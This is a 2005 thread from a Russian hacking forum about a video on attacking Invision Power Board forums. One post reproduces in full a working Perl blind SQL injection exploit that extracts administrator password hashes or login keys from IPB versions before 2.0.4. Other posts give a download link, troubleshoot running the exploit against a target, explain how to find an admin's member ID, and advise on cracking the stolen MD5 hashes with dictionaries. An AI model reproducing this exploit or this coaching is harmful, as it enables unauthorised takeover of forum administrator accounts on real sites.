Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Комментарии к видео (https://forum.antichat.xyz/forumdisplay.php?f=27)
-   -   Новое видео. IPB hacking. (https://forum.antichat.xyz/showthread.php?t=8107)

Vandal 16.07.2005 01:05

Новое видео. IPB hacking.
 
Где сплоийт взял ?


У кого есть поделлитесь

gagarin_y_vas_Lubila_o@rambler.ru

SanyaX 16.07.2005 05:53

смотри на www.securitylab.ru в разделе РОС.

Vandal 16.07.2005 16:38

Все нашел .

Vandal 16.07.2005 17:04

C:\>Perl\bin\perl.exe C:\ipd.pl
Can't locate IO/Socket.pm in @INC (@INC contains: c:/perl/lib/perl5 c:/perl/lib/
perl5/site c:/perl/lib/perl5/site .) at C:\ipd.pl line 37.
BEGIN failed--compilation aborted at C:\ipd.pl line 37.


Это что ?

KEZ 16.07.2005 17:22

Цитата:

Это что ?
А вот это для кого написали?

Цитата:

Can't locate IO/Socket.pm

Vandal 16.07.2005 17:38

Цитата:

Сообщение от kez
А вот это для кого написали?


Я англиский плохо знаю , я всю жизнь француский учил .

Vandal 16.07.2005 18:06

Все все ...
понял

Vandal 16.07.2005 18:59

Почему у меня он пасс в виде звездочек выдает ******************

GoRiLLa 16.07.2005 23:34

Цитата:

Почему у меня он пасс в виде звездочек выдает ******************
потому, что каменты на секюритилабе читать надо

Vandal 16.07.2005 23:38

Спасибо

Vandal 16.07.2005 23:39

ОК !

santos 17.07.2005 02:00

Гы я даже сначало не ксплойт качал а пошел почитал и уже потом скачал а ты сразу давай юзать им ...... блин вот я только расшифровывать устал =((

НЕО 21.07.2005 01:23

Цитата:

Сообщение от dim_ok
правь сорсы

где? здесь?

Код:

#!/usr/bin/perl

## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (<2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~]    SERVER : blah.com
## [~]      PATH : /ipb13/
## [~] MEMBER ID : 1
## [~]    TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com  /ipb202/ 1 1
## [~]    SERVER : blah.com
## [~]      PATH : /ipb202/
## [~] MEMBER ID : 1
## [~]    TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use IO::Socket;

if (@ARGV < 4) { &usage; }

$server    = $ARGV[0];
$path      = $ARGV[1];
$member_id = $ARGV[2];
$target    = $ARGV[3];

$pass = ($target)?('member_login_key'):('password');

$server =~ s!(http:\/\/)!!;

$request  = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;

print "[~]    SERVER : $server\r\n";
print "[~]      PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~]    TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";

($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
 {
 if(length($allchar) > 0){
 print qq{\b\b DONE ]
 
 MEMBER ID : $member_id
 };
 print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
 print $allchar."\r\n";
 }
 else
 {
 print "\b\b FAILED ]";
 }
 exit(); 
 }
else
 { 
  $allchar .= chr(42);
 }
$s_num++;
}

sub found($$)
 {
 my $fmin = $_[0];
 my $fmax = $_[1];
 if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
 
 $r = int($fmax - ($fmax-$fmin)/2);
 $check = " BETWEEN $r AND $fmax";
 if ( &check($check) ) { &found($r,$fmax); }
 else { &found($fmin,$r); }
 }
 
sub crack($$)
 {
 my $cmin = $_[0];
 my $cmax = $_[1];
 $i = $cmin;
 while ($i<$cmax)
  {
  $crcheck = "=$i";
  if ( &check($crcheck) ) { return $i; }
  $i++;
  }
 $i = 0;
 return $i;
 }
 
sub check($)
 {
 $n++;
 status();
 $ccheck = $_[0];
 $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
 $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";
 $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
 $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
 $nmalykh    = "%26%231054%3B%26%231081%3B+%26%231088%3B%26%231072%3B%26%231073%3B%26%231086%3B%26%231090%3B%26%231072%3B%26%231077%3B%26%231090%3B%21";
 $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");

 printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
 $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);
 
 while(<$socket>)
  {
  if (/Set-Cookie: session_id=0;/) { return 1; }
  }

 return 0;
 }
 
sub status()
{
  $status = $n % 5;
  if($status==0){ print "\b\b/]";  }
  if($status==1){ print "\b\b-]";  }
  if($status==2){ print "\b\b\\]"; }
  if($status==3){ print "\b\b|]";  }
}

sub usage()
 {
 print q(
 Invision Power Board v < 2.0.4 SQL injection exploit
 ----------------------------------------------------
 USAGE:
 ~~~~~~
 r57ipb2.pl [server] [/folder/] [member_id] [target]
 
 [server]    - host where IPB installed
 [/folder/]  - folder where IPB installed
 [member_id] - user id for brute
 
 targets:
          0 - IPB 1.*
          1 - IPB 2.* (Prior To 2.0.4)
 
 e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
 ----------------------------------------------------
 (c)oded by 1dt.w0lf
 RST/GHC , http://rst.void.ru , http://ghc.ru
 );
 exit();
 }


BrainDeaD 21.07.2005 05:26

во блин люди обленились! :mad:
да загляни на предыдущую страницу, там всё уже написано.

НЕО 21.07.2005 17:02

Microsoft Windows XP [version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\НЕО>cd\

C:\>Perl\bin\perl.exe C:\ipb.pl http://domain.com /forum/ 1 0
[~] SERVER : domain.com
[~] PATH : /forum/
[~] MEMBER ID : 1
[~] TARGET : 0 - IPB 1.*
[~] SEARCHING PASSWORD ... [ FAILED ]

но почему FAILED, почему!!! :( не могу больше, что надо делать???

SanyaX 21.07.2005 17:18

Не смеши я в видео всё показал.
1.Может версия 2.0.4
2.Может и даже до 2.0.4 ты просто последнию цифру поставь 0 (для версии 1*) 1 (для версии до 2.0.4)
3.Вот и думай!

Safo 22.07.2005 14:44

я жалкий ламер! =((
помогите я нифига не понимаю, установил Перл, но я нифига не понимаю про ipb.pl что это такое и где его брать??? =((

PIR@T 25.07.2005 17:51

Цитата:

Сообщение от Safo
я жалкий ламер! =((
помогите я нифига не понимаю, установил Перл, но я нифига не понимаю про ipb.pl что это такое и где его брать??? =((

Брать тут http://rst.void.ru/download/r57ipb2.txt
Потом создаёшь текстовой документ и копируешь всё это туда и сохраняешь с расширением .pl
Удачи.....

Otaku 26.07.2005 05:42

Тока про звёздочки не спрашивай=^ ^=

К.е.Н 26.07.2005 20:28

А где перл взять киньте ссылку

GreenBear 26.07.2005 21:14

http://forum.antichat.ru/thread7042.html

Arthas 31.07.2005 09:43

C:\Documents and Settings\Arthas>cd\

объясните пожалуйста что это означает: cd\

qBiN 31.07.2005 11:58

ps почему античат не ставит бан таким людям....
ззы "cd \" комманда смена каталога на корневой...
зззы и для кого хелпы пишут...

Vandal 31.07.2005 12:52

пуск>выполнить>cmd>help

все узнаеш

Arthas 31.07.2005 16:05

Цитата:

Сообщение от qBiN
ps почему античат не ставит бан таким людям....
ззы "cd \" комманда смена каталога на корневой...
зззы и для кого хелпы пишут...

те, которые хотят научить что то не имеют право высказываться?

Цитата:

Сообщение от Vandal
пуск>выполнить>cmd>help

все узнаеш

большое спасибо

Arthas 01.08.2005 16:03

у меня еще один вопрос, когда хотим расшифровать хещ пользователя Ipb форума, тогда обязательно надо указать тип хеща Md5, или как?

P.s. прошу прощения, если мой вопрос очень глупый

lexa 04.08.2005 11:46

Цитата:

Сообщение от qBiN
ps почему античат не ставит бан таким людям....
ззы "cd \" комманда смена каталога на корневой...
зззы и для кого хелпы пишут...

я тоже такого мнения , и согласен :mad: надо банить

GreenBear 05.08.2005 09:55

Цитата:

Сообщение от Arthas
у меня еще один вопрос, когда хотим расшифровать хещ пользователя Ipb форума, тогда обязательно надо указать тип хеща Md5, или как?

P.s. прошу прощения, если мой вопрос очень глупый

ну зачем же сразу мд5.. укажи мускул хеш или хеш ворда =)))
ответ: да, нужно указать как тип хеша мд5....

SanyaX 06.08.2005 14:07

На www.securitylab.ru на форуме читай там всё написано!

Astro 07.08.2005 14:00

Люди, я конечно чайник полный, но подскажите, в чём причина того, что когда я пытаюсь с помощью эксплоита узнать хеш у меня в командной строке пишеться вот это:
can't locate object method "get" via package "LWP: :UserAgent" <perhaps you forgot to load "LWP: :UserAgent"?> at C:ibp.pl line 45
Прошу не ругать английский знаю плохо, попробовал перевести только больше запутался.

KEZ 07.08.2005 17:14

Цитата:

пуск>выполнить>cmd>help
Да ты че, он под QNX сидит...

Astro 08.08.2005 12:53

Все решил свою проблему и со звездочками то же....
Но вот вопрос Id пользователя- это по порядку регистрации или в каком порядке стоят админы. Поясняю: У меня есть Админ в колонке админов он стоит вторым, а зарегился на форуме пятым, какой мне Id ставить- 2 или 5?

Azazel 08.08.2005 13:05

Если ты свой пасс ищешь то ставь 5, если админа то ....
При просмотре профиля админа смотришь в адресную строку ..............showuser=(Id админа).

Astro 09.08.2005 17:45

вот еще вопрос, на видио пароль по хешу нашелся меньше чём за секунду, а у меня PasswordPro пишет что будет искать 4 дня, даже если выбрать только числовые пароли в радиусе от 4 до 12 знаков. Это нормально?

Azazel 09.08.2005 17:55

Абсолютно нормально. А с чего ты взял что у тебя числовой пароль? Поставь лучше a-z, 0-9, до шести знаков. Может повезёт.

Otaku 11.08.2005 08:21

Словари вначале попробуй.
Там один админ? Просто если их несколько больше шанс,что у кого то из них простой пароль.

S@cred 11.08.2005 10:40

Привет,у меня PasswordPro,я туда забил словарей на 12 мегов,и он больше есть их не хочет,а когда пробую расшифровать хеш,он пробивает всего пару слов и говорит всё!
У меня голимый проц,так что это решение не для меня.
Подставляю куки и id админа,не х неполучается,в чём может быть проблема?

GoRiLLa 11.08.2005 15:45

Цитата:

Подставляю куки и id админа,не х неполучается,в чём может быть проблема?
В кривых руках. Неправельно чтото делаешь.

S@cred 12.08.2005 00:46

Да врятли,посмотри видео (щас нет времени отснимать,в этом видео странный[короткий] хеш),но так же делал с нормальным хешем,и тоже самое...Блин чё не так?!!
http://moder-pro.narod.ru/1.rar

Azazel 12.08.2005 02:00

S@cred Хэш MD5 состоит из 32 символов. Других вариантов нет.
2. 12 мегов? Считаешь что это много? Объедини их в один файл, в PassPro можно загнать 32 файла словарей.
12 мегов перебираются очень быстро. Если ты в левом нижнем углу увидел только два паса - ничего не значит. Всё перебралось.


Время: 11:38